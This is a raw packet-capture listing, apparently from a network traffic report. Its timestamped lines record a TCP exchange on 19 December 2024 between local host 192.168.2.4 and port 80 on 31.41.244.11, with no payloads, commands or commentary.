                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.273699045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.274657011 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.274703979 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.274739981 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.275749922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.275912046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.275939941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.276140928 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.276865959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.277066946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.277164936 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.277990103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.278072119 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.278125048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.279139996 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.279194117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.279202938 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.280042887 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.280188084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.280276060 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.280302048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.280419111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.281399012 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.281451941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.281471014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.282385111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.282538891 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.282586098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.283567905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.283617020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.283652067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.284070969 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.284660101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.284728050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.284817934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.285800934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.285818100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.285876989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.285876989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.286815882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.286941051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.287018061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.288052082 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.288068056 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.288217068 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.289112091 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.289190054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.289222956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.290189981 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.290261030 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.290292025 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.291263103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.291322947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.291346073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.292059898 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.292423964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.292501926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.292552948 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.293580055 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.293596983 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.293642044 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.294584990 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.294660091 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.294691086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.295751095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.295794964 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.295828104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.296036005 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.296830893 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.296907902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.296966076 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.297933102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.298001051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.298052073 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.299000978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.299053907 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.299127102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.300055981 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.300154924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.300194979 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.300235987 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.301248074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.301392078 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.301475048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.302366972 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.302401066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.302499056 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.303443909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.303534985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.303566933 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.303647041 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.304507017 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.304704905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.304748058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.305628061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.305763960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.305809021 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.306754112 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.306886911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.306911945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.307997942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.308013916 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.308043957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.308043957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.308069944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.309020042 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.309062958 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.309075117 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.310112953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.310128927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.310182095 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.311192036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.311283112 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.311347008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.312299013 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.312432051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.312489033 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.313410997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.313474894 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.313586950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.314500093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.314553976 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.314654112 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.315681934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.315722942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.315741062 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.315828085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.316751957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.316832066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.316900015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.317850113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.317867994 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.317922115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.319025993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.319041967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.319086075 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.320024014 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.320154905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.320224047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.321192980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.321290016 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.321341038 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.322259903 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.322340012 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.322371006 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.323504925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.323609114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.323632956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.324040890 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.324590921 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.324692965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.324774027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.325572014 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.328061104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.459697962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.459858894 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.459916115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.460192919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.460335016 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.460381985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.461287975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.461343050 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.461416960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.461464882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.462445974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.462462902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.462498903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.462513924 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.463519096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.463726044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.463777065 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.464713097 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.464853048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.464898109 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.465689898 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.465733051 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.465804100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.465873003 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.466788054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.466902018 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.466952085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.467905045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.467983961 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.468137026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.468179941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.469130993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.469146967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.469180107 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.469196081 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.470432043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.470448971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.470494986 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.471295118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.471366882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.471416950 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.472373962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.472590923 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.472640038 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.473500967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.473556042 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.473788977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.473881006 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.474560976 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.474669933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.474750996 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.474791050 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.475662947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.475781918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.475800991 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.475826025 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.476763964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.476824999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.476974010 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.477395058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.477912903 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.477977037 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.478020906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.478092909 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.478979111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.479033947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.479137897 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.479176044 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.480093956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.480135918 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.480253935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.480320930 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.481373072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.481389046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.481426001 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.481446028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.482306957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.482435942 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.482439995 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.482511997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.483546972 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.483562946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.483587980 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.483604908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.484644890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.484687090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.484694958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.484735012 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.485680103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.485719919 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.485785007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.485827923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.486761093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.486908913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.486913919 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.487024069 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.487843990 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.487905979 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.487994909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.488162041 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.489038944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.489056110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.489092112 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.489109039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.490117073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.490174055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.490176916 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.490219116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.491210938 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.491293907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.491328001 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.491344929 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.492294073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.492388964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.492441893 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.493423939 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.493496895 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.493552923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.494600058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.494653940 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.494709969 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.495587111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:52.495690107 CET4986080192.168.2.431.41.244.11
